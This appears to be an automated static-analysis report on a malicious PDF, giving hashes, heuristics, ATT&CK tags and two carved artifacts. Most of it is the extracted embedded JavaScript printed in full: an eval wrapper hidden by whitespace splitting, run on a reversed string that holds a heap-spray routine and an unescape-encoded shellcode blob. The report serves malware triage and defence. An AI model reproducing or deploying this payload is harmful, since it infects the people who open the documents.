Malicious PDF — malware analysis report

Static analysis result for SHA-256 967540a251d0907c…

MALICIOUS

PDF

Size: 69.9 KB — First seen: 2026-05-07
MD5: 079dd185f2c8f811b851138f6436e103 SHA-1: 0327118a51d897ba15b907d2bba2262de4a5917b SHA-256: 967540a251d0907c5461eb764facf95f7e824c578780e2dd2b2bfe7033418249
Risk score: 68

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF document contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The extracted artifact 'javascript_obj0012_000.js' is a suspicious JavaScript file; its preview shows an eval wrapper whose name is hidden by whitespace splitting, applied to a string stored in reverse. The embedded URL 'http://www.bitstream.com' was found in the PDF document text rather than in the extracted script (see the EMBEDDED_URL finding); it is likely used to fetch additional malicious content, but that is an inference, not a confirmed download channel. The primary intent appears to be the execution of a second-stage payload via the embedded script; the embedded font artifact also yielded a candidate shellcode region with a heap-spray indicator.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 4452 bytes
SHA-256: d321ad6c17f2a4ef129e9c7338676401196a33eb6523dd20432e7bf841b81b73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst note: builds a Function whose body is "eval(a);" — the literal is padded with spaces and
// then split/joined so the string "eval" never appears intact; this is the eval/decoder token that
// the static triage on this artifact reports.
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."8d14  u % 37c4  u % 7888  u % 3f6a  u % 62de  u % f5a3  u % 54a6  u % f5fe  u % 125b  u % eca7  u % 9c7c  u % 18cb  u % bb2c  u % 27c9  u % e0a3  u % b4f1  u % 3d4f  u % 50c9  u % 105a  u % d813  u % 8138  u % 27b7  u % 9c6a  u % 5e26  u % 2492  u % c835  u % 9397  u % a8b4  u % 20c3  u % b49b  u % 8565  u % f1fb  u % 214b  u % eba1  u % 0c8c  u % fc5e  u % 15c6  u % b044  u % 5772  u % f4f5  u % 29ea  u % 2c85  u % 9929  u % 33b8  u % ebe8  u % 67f   f  u % 5308  u % 1991  u % cc17  u % 1deb  u % 9c1d  u % 50b2  u % a0aa  u % 8782  u % 0f94  u % 78d5  u % 4bd6  u % a030  u % 9804  u % 22c4  u % 0617  u % 2ed7  u % 29e6  u % 5468  u % ea72  u % 0855  u % d061  u % aea0  u % 54ee  u % 13d7  u % b3eb  u % 447c  u % e387  u % 4fcb  u % 8e3f  u % 42db  u % b5da  u % 5780  u % 286a  u % a785  u % 54ab  u % 7691  u % b717  u % 239b  u % 78b6  u % 0f79  u % 707a  u % fe11  u % 0d88  u % 64a9  u % 4f76  u % dc6d  u %  0   937  u % c3d1  u % 2dd1  u % d 0   98  u % 5a45  u % c3b9  u % c21b  u % bb8f  u % 3c94  u % 35d6  u % 3 0   90  u % 6511  u % cf13  u % 38ee  u % 4fe5  u % 4742  u % 339d  u % 631b  u % 24f8  u % abf5  u % bd2c  u % 929c  u %  0   070  u % f211  u %  0   070  u % 137d  u %  0   070  u % d451  u % f   f 0   9  u % f   ff   f  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  0   9 0   9  u %  0   9 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070 
 u % d451  u %  0   9 0   9  u %  0   9 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  0   9 0   9  u % f   f 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % f   ff   f  u % 8e6e  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % be50  u % 57ee  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  c   0 c   0  u %  c   0 c   0  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 18bf  u % 2c40  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 4038  u % 380c  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 9881  u % b8a1  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 5185  u % a5be  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 45 0   9  u % a5 0   9  u %  0   070  u % bb51  u %  0   070  u % 137d  u %  0   0 0   0  u % 04 0   0  u %  0   0 0   0  u % 0 0   01  u % 10 0   0  u % 4010  u %  0   0 0   0  u %  0   0 0   0  u % 10 0   0  u %  0   010  u % f   ff   f  u % f   ff   f  u %  0   070  u % 45c5  u %  0   070  u % 2e25  u % 10 0   0  u % 11 0   0  u %  0   070  u % 7f27  u %  0   070  u % ca8a  u % 10 0   0  u %  0   010  u %  0   070  u % bb51  u %  0   070  u % ca8a  u % 10 0   0  u % 11 0   0  u %  0   070  u % bb51  u %  0   070  u % 2bf7  u % ef   f7  u %  0   030  u %  0   070  u % bb51  u %  0   070  u % d451  u %  0   0 0   0  u % 0 0   01  u %  0   070  u % bb51  u % 10 0   0  u % 4010  u %  0   070  u % 7f27  u % 10 0   0  u % 4210  u %  0   070  u % 9951  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  c   0 c   0  u %  c   0 c   0  u %  0   070  u % 48 0   9  u %  0   070  u % 33 0   9  u %  0   070  u % 48 0   9  
u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u % cccc  u % cccc  u %  0   070  u % f651  u %  0   070  u % fe84  u % cccc  u % cccc  u %  0   070  u % 9194  u %  c   0 c   0  u %  c   0 c   0  u % " (epak = olygak rav ;epacsenu = epak rav ';
// Analyst note: s is stored reversed, so the preview above reads backwards; it is reversed at
// runtime and handed to the eval wrapper. Its contents (second stage) are not decoded in this report.
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found one or more candidate code region(s). Indicator: a heap-spray-like run of 0x41 ('A') bytes. This is a candidate, not a confirmed shellcode detection; the flagged region of the font stream should be inspected to confirm it.